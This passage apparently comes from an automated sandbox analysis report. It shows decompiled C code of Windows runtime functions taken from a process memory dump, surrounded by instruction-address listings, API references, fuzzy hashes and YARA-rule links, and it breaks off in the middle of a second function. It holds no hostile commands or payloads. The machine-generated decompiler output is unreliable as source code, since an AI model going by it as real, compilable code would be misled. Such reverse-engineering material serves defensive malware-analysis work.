                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed7d
                                                                                                                                                        0x0092ed30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed3c
                                                                                                                                                        0x0092ed43
                                                                                                                                                        0x0092ed4b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: 7839d0770ed58b7be5dc0245013052c5d3921c76c0faf561e5260a59cbb3be55
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 1D914931D0021EEBDF24DFA8C8456FEB7B4FF55314F24847AD651EA2A2E7305A818B91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0097E9FF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 435COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                        			E0097E9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
				signed int _v5;
				int _v12;
				signed int _v16;
				char _v20;
				int _v24;
				signed int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v96;
				char _v100;
				void _v140;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v172;
				char _v216;
				char _v220;
				void* __edi;
				void* __esi;
				void* _t231;
				signed char _t233;
				signed int _t237;
				signed int _t238;
				signed int _t244;
				short _t251;
				signed int _t253;
				signed int* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t267;
				signed int _t271;
				intOrPtr _t281;
				signed int _t314;
				signed char _t316;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				int _t340;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E008CDFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E0097E919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0x97c2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E0097E519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E008BF9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E008CE025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E008C2340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E008CDFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E008BF938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E008BFC48(_v12);
									_a4 = _t267;
									__eflags = _t267;
									if(_t267 < 0) {
										goto L49;
									} else {
										goto L48;
									}
								}
							}
							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
							 *_t341 = 0xc0010000;
							_t271 =  *(_t370 + 0x10);
							__eflags = _t271 - 2;
							if(_t271 != 2) {
								__eflags = _t271 - 3;
								if(_t271 != 3) {
									_v48 = 0;
									_v44 = 0;
									E008D2954(1, _t372,  &_v48);
									 *(_t341 + 0x10) = _v48;
									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
									L34:
									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
									 *((intOrPtr*)(_t341 + 8)) = _v160;
									 *((intOrPtr*)(_t341 + 0x18)) = E00904FC0(_v84, _v80, _v140, 0);
									 *((intOrPtr*)(_t341 + 0x1c)) = E00904FC0(_v76, _v72, _v140, 0);
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
									 *((char*)(_t372 + 0x6e)) = 1;
									 *((char*)(_t372 + 0x6f)) = 5;
									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
									 *(_t372 + 0x170) =  *(_t370 + 0x10);
									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
									 *((intOrPtr*)(_t372 + 0x90)) = 1;
									 *(_t372 + 0x8c) = 1;
									 *((intOrPtr*)(_t372 + 0x94)) = 4;
									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
									_t163 = _t372 + 0x178; // 0x178
									E008C2340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
									E008C2340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
									_t169 = _t372 + 0xa8; // 0xa8
									E0097E649(0, _t370, _t372, _t169);
									_t170 = _t372 + 0x160; // 0x160
									E008DB2FA(_v16, 0, _t170);
									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
									 *(_t341 + 0x10) =  *(_t370 + 8);
									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
									goto L39;
								}
								asm("rdtsc");
								L32:
								 *(_t341 + 0x10) = _t271;
								 *((intOrPtr*)(_t341 + 0x14)) = 0;
								goto L34;
							}
							_t271 = E0097BCFC();
							goto L32;
						}
						_push(0);
						_push( &_v68);
						_push(_v16);
						_push(_t372);
						_push( &_v60);
						_push(0);
						_push(0);
						_push(0);
						_v68 = 0;
						_v64 = 0;
						_t314 = E008BF900(_v12);
						_a4 = _t314;
						__eflags = _t314;
						if(_t314 < 0) {
							goto L49;
						}
						_t316 =  *(_t372 + 0x88) >> 1;
						__eflags = _t316 & 0x00000001;
						if((_t316 & 0x00000001) == 0) {
							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
								goto L18;
							}
							_t319 =  *((intOrPtr*)(_t372 + 0x68));
							_t343 =  *(_t372 + 0x8c);
							_v16 = _t319;
							__eflags = _t319 + 0xfffffc00 - 0xffc00;
							if(_t319 + 0xfffffc00 > 0xffc00) {
								goto L18;
							}
							__eflags = _t343;
							if(_t343 == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x74);
							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
								goto L18;
							}
							_push(0);
							_push( &_v68);
							 *(_t372 + 0x78) = 0;
							 *(_t372 + 0x7c) = 0;
							_push( *(_t370 + 0x80));
							_t348 =  &_v60;
							_push(_t372);
							_push( &_v60);
							_push(0);
							_push(0);
							_push(0);
							_t322 = E008BF938(_v12);
							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
							_a4 = _t322;
							_t323 = _v16;
							 *(_t370 + 0x100) = _t343;
							 *(_t370 + 0xd8) = _t343;
							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
							 *(_t370 + 0x80) = _t323;
							 *(_t370 + 0xe8) = _t323;
							 *(_t370 + 0xf0) = _t343 * _t323;
							 *(_t370 + 0x5c) = _v12;
							goto L51;
						}
						L18:
						_a4 = 0xc000000d;
						goto L49;
					}
					_a4 = 0xc0000017;
					goto L52;
				}
				_push(_t340);
				_push(0x2c);
				_push( &_v144);
				_t326 = E008BFDC0(_t340);
				_a4 = _t326;
				if(_t326 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x1c);
				_push( &_v172);
				_push(_t340);
				_t328 = E008BFC18(0xfffffffe);
				_a4 = _t328;
				if(_t328 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x20);
				_push( &_v100);
				_push(1);
				_t330 = E008BFC18(0xfffffffe);
				_a4 = _t330;
				if(_t330 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x30);
				_push( &_v220);
				_t332 = E008BFDC0(3);
				_a4 = _t332;
				if(_t332 < _t340) {
					goto L54;
				}
				_t334 = E00918001(_t348, _t360, _t370, _t340,  &_v20);
				_a4 = _t334;
				if(_t334 < _t340) {
					goto L54;
				}
				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
				goto L12;
			}





































































                                                                                                                                                        0x0097e9ff
                                                                                                                                                        0x0097ea0f
                                                                                                                                                        0x0097ea11
                                                                                                                                                        0x0097ea1c
                                                                                                                                                        0x0097ea22
                                                                                                                                                        0x0097ea2c
                                                                                                                                                        0x0097ea2f
                                                                                                                                                        0x0097ea35
                                                                                                                                                        0x0097ea3a
                                                                                                                                                        0x0097ea44
                                                                                                                                                        0x0097ea48
                                                                                                                                                        0x0097ea4b
                                                                                                                                                        0x0097ea4b
                                                                                                                                                        0x0097ea4d
                                                                                                                                                        0x0097ea50
                                                                                                                                                        0x0097ea53
                                                                                                                                                        0x0097ea56
                                                                                                                                                        0x0097ea5b
                                                                                                                                                        0x0097ea5d
                                                                                                                                                        0x0097ea5d
                                                                                                                                                        0x0097ea61
                                                                                                                                                        0x0097ea6a
                                                                                                                                                        0x0097ea6d
                                                                                                                                                        0x0097ea6f
                                                                                                                                                        0x0097ea7d
                                                                                                                                                        0x0097ea7d
                                                                                                                                                        0x0097ea85
                                                                                                                                                        0x0097ea8e
                                                                                                                                                        0x0097ea94
                                                                                                                                                        0x0097eb2f
                                                                                                                                                        0x0097eb32
                                                                                                                                                        0x0097eb35
                                                                                                                                                        0x0097eb35
                                                                                                                                                        0x0097eb39
                                                                                                                                                        0x0097eb3c
                                                                                                                                                        0x0097eb3c
                                                                                                                                                        0x0097eb3f
                                                                                                                                                        0x0097eb42
                                                                                                                                                        0x0097eb58
                                                                                                                                                        0x0097eb5c
                                                                                                                                                        0x0097eb81
                                                                                                                                                        0x0097eb81
                                                                                                                                                        0x0097eb84
                                                                                                                                                        0x0097eb8b
                                                                                                                                                        0x0097eb8d
                                                                                                                                                        0x0097eb90
                                                                                                                                                        0x0097ef60
                                                                                                                                                        0x0097ef60
                                                                                                                                                        0x0097ef64
                                                                                                                                                        0x0097ef69
                                                                                                                                                        0x0097ef69
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef70
                                                                                                                                                        0x0097ef72
                                                                                                                                                        0x0097ef82
                                                                                                                                                        0x0097ef82
                                                                                                                                                        0x0097ef87
                                                                                                                                                        0x0097ef8e
                                                                                                                                                        0x0097ef8e
                                                                                                                                                        0x0097eb96
                                                                                                                                                        0x0097eb9a
                                                                                                                                                        0x0097ec92
                                                                                                                                                        0x0097ec98
                                                                                                                                                        0x0097ec9a
                                                                                                                                                        0x0097eca0
                                                                                                                                                        0x0097eca4
                                                                                                                                                        0x0097eca7
                                                                                                                                                        0x0097ecab
                                                                                                                                                        0x0097ecae
                                                                                                                                                        0x0097ecb1
                                                                                                                                                        0x0097ee59
                                                                                                                                                        0x0097ee68
                                                                                                                                                        0x0097ee6b
                                                                                                                                                        0x0097ee74
                                                                                                                                                        0x0097ee76
                                                                                                                                                        0x0097ee7a
                                                                                                                                                        0x0097ee7e
                                                                                                                                                        0x0097ee82
                                                                                                                                                        0x0097ee8c
                                                                                                                                                        0x0097ee8c
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee95
                                                                                                                                                        0x0097ee9c
                                                                                                                                                        0x0097eea4
                                                                                                                                                        0x0097eea4
                                                                                                                                                        0x0097eea7
                                                                                                                                                        0x0097eeaa
                                                                                                                                                        0x0097eeac
                                                                                                                                                        0x0097eeae
                                                                                                                                                        0x0097eeb1
                                                                                                                                                        0x0097eeb8
                                                                                                                                                        0x0097eec0
                                                                                                                                                        0x0097eec5
                                                                                                                                                        0x0097eeb1
                                                                                                                                                        0x0097eeca
                                                                                                                                                        0x0097eecb
                                                                                                                                                        0x0097eecc
                                                                                                                                                        0x0097eecd
                                                                                                                                                        0x0097eece
                                                                                                                                                        0x0097eed1
                                                                                                                                                        0x0097eed2
                                                                                                                                                        0x0097eed3
                                                                                                                                                        0x0097eed4
                                                                                                                                                        0x0097eed8
                                                                                                                                                        0x0097eedd
                                                                                                                                                        0x0097eee0
                                                                                                                                                        0x0097eee2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eee4
                                                                                                                                                        0x0097eee4
                                                                                                                                                        0x0097eeea
                                                                                                                                                        0x0097eeec
                                                                                                                                                        0x0097ef2e
                                                                                                                                                        0x0097ef2e
                                                                                                                                                        0x0097ef34
                                                                                                                                                        0x0097ef3a
                                                                                                                                                        0x0097ef40
                                                                                                                                                        0x0097ef42
                                                                                                                                                        0x0097ef48
                                                                                                                                                        0x0097ef4e
                                                                                                                                                        0x0097ef54
                                                                                                                                                        0x0097ef5a
                                                                                                                                                        0x0097ef5d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ef5d
                                                                                                                                                        0x0097eeee
                                                                                                                                                        0x0097eef4
                                                                                                                                                        0x0097eef7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eef9
                                                                                                                                                        0x0097eeff
                                                                                                                                                        0x0097ef04
                                                                                                                                                        0x0097ef06
                                                                                                                                                        0x0097ef06
                                                                                                                                                        0x0097ef0d
                                                                                                                                                        0x0097ef0f
                                                                                                                                                        0x0097ef12
                                                                                                                                                        0x0097ef17
                                                                                                                                                        0x0097ef1b
                                                                                                                                                        0x0097ef1f
                                                                                                                                                        0x0097ef22
                                                                                                                                                        0x0097ef27
                                                                                                                                                        0x0097ef2a
                                                                                                                                                        0x0097ef2c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ef2c
                                                                                                                                                        0x0097eee2
                                                                                                                                                        0x0097ecba
                                                                                                                                                        0x0097ecbd
                                                                                                                                                        0x0097ecc3
                                                                                                                                                        0x0097ecc6
                                                                                                                                                        0x0097ecc9
                                                                                                                                                        0x0097ecd2
                                                                                                                                                        0x0097ecd5
                                                                                                                                                        0x0097ece5
                                                                                                                                                        0x0097ece8
                                                                                                                                                        0x0097eceb
                                                                                                                                                        0x0097ecf3
                                                                                                                                                        0x0097ecf9
                                                                                                                                                        0x0097ecfc
                                                                                                                                                        0x0097ed02
                                                                                                                                                        0x0097ed0d
                                                                                                                                                        0x0097ed23
                                                                                                                                                        0x0097ed37
                                                                                                                                                        0x0097ed40
                                                                                                                                                        0x0097ed49
                                                                                                                                                        0x0097ed52
                                                                                                                                                        0x0097ed58
                                                                                                                                                        0x0097ed5c
                                                                                                                                                        0x0097ed67
                                                                                                                                                        0x0097ed6d
                                                                                                                                                        0x0097ed76
                                                                                                                                                        0x0097ed7c
                                                                                                                                                        0x0097ed82
                                                                                                                                                        0x0097ed88
                                                                                                                                                        0x0097ed92
                                                                                                                                                        0x0097ed9b
                                                                                                                                                        0x0097eda7
                                                                                                                                                        0x0097edb3
                                                                                                                                                        0x0097edbf
                                                                                                                                                        0x0097edcb
                                                                                                                                                        0x0097edd2
                                                                                                                                                        0x0097edd9
                                                                                                                                                        0x0097ede2
                                                                                                                                                        0x0097edf2
                                                                                                                                                        0x0097edf9
                                                                                                                                                        0x0097ee14
                                                                                                                                                        0x0097ee1c
                                                                                                                                                        0x0097ee23
                                                                                                                                                        0x0097ee28
                                                                                                                                                        0x0097ee2f
                                                                                                                                                        0x0097ee36
                                                                                                                                                        0x0097ee3f
                                                                                                                                                        0x0097ee48
                                                                                                                                                        0x0097ee4e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ee4e
                                                                                                                                                        0x0097ecd7
                                                                                                                                                        0x0097ecd9
                                                                                                                                                        0x0097ecd9
                                                                                                                                                        0x0097ecdc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ecdc
                                                                                                                                                        0x0097eccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eccb
                                                                                                                                                        0x0097eba0
                                                                                                                                                        0x0097eba4
                                                                                                                                                        0x0097eba5
                                                                                                                                                        0x0097ebab
                                                                                                                                                        0x0097ebac
                                                                                                                                                        0x0097ebad
                                                                                                                                                        0x0097ebae
                                                                                                                                                        0x0097ebaf
                                                                                                                                                        0x0097ebb3
                                                                                                                                                        0x0097ebb6
                                                                                                                                                        0x0097ebb9
                                                                                                                                                        0x0097ebbe
                                                                                                                                                        0x0097ebc1
                                                                                                                                                        0x0097ebc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ebcf
                                                                                                                                                        0x0097ebd1
                                                                                                                                                        0x0097ebd3
                                                                                                                                                        0x0097ebe4
                                                                                                                                                        0x0097ebea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ebef
                                                                                                                                                        0x0097ebf5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ebf7
                                                                                                                                                        0x0097ebfe
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec00
                                                                                                                                                        0x0097ec03
                                                                                                                                                        0x0097ec09
                                                                                                                                                        0x0097ec11
                                                                                                                                                        0x0097ec16
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec1a
                                                                                                                                                        0x0097ec1c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec21
                                                                                                                                                        0x0097ec21
                                                                                                                                                        0x0097ec24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec26
                                                                                                                                                        0x0097ec29
                                                                                                                                                        0x0097ec2c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec2e
                                                                                                                                                        0x0097ec32
                                                                                                                                                        0x0097ec33
                                                                                                                                                        0x0097ec36
                                                                                                                                                        0x0097ec39
                                                                                                                                                        0x0097ec3f
                                                                                                                                                        0x0097ec42
                                                                                                                                                        0x0097ec43
                                                                                                                                                        0x0097ec44
                                                                                                                                                        0x0097ec45
                                                                                                                                                        0x0097ec46
                                                                                                                                                        0x0097ec4a
                                                                                                                                                        0x0097ec4f
                                                                                                                                                        0x0097ec56
                                                                                                                                                        0x0097ec59
                                                                                                                                                        0x0097ec5c
                                                                                                                                                        0x0097ec62
                                                                                                                                                        0x0097ec6b
                                                                                                                                                        0x0097ec72
                                                                                                                                                        0x0097ec78
                                                                                                                                                        0x0097ec81
                                                                                                                                                        0x0097ec87
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ec87
                                                                                                                                                        0x0097ebd5
                                                                                                                                                        0x0097ebd5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ebd5
                                                                                                                                                        0x0097eb5e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eb5e
                                                                                                                                                        0x0097ea9a
                                                                                                                                                        0x0097ea9b
                                                                                                                                                        0x0097eaa3
                                                                                                                                                        0x0097eaa5
                                                                                                                                                        0x0097eaac
                                                                                                                                                        0x0097eaaf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eab5
                                                                                                                                                        0x0097eab6
                                                                                                                                                        0x0097eabe
                                                                                                                                                        0x0097eabf
                                                                                                                                                        0x0097eac2
                                                                                                                                                        0x0097eac9
                                                                                                                                                        0x0097eacc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ead2
                                                                                                                                                        0x0097ead3
                                                                                                                                                        0x0097ead8
                                                                                                                                                        0x0097ead9
                                                                                                                                                        0x0097eadd
                                                                                                                                                        0x0097eae4
                                                                                                                                                        0x0097eae7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eaed
                                                                                                                                                        0x0097eaee
                                                                                                                                                        0x0097eaf6
                                                                                                                                                        0x0097eaf9
                                                                                                                                                        0x0097eb00
                                                                                                                                                        0x0097eb03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eb0e
                                                                                                                                                        0x0097eb15
                                                                                                                                                        0x0097eb18
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eb22
                                                                                                                                                        0x0097eb26
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097ED1C
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097ED32
                                                                                                                                                          • Part of subcall function 008BF900: LdrInitializeThunk.NTDLL ref: 008BF90E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                        • String ID: 409
                                                                                                                                                        • API String ID: 1404860816-1549806245
                                                                                                                                                        • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                        • Instruction ID: 78af8deb9bae679c54e7c357312de7fdb44756244be3543d62a9654558662c6d
                                                                                                                                                        • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                        • Instruction Fuzzy Hash: 4B022DB1900749EFDB55DF69C880BEABBF8FF08300F0085AAE999D7651D734A954CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00975CFA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                        			E00975CFA(void* __edx, void* __edi, signed int __esi, signed int _a4, signed int _a8, signed char _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				signed char _v40;
				void* __ebx;
				intOrPtr* _t117;
				signed int _t118;
				void* _t119;
				intOrPtr _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
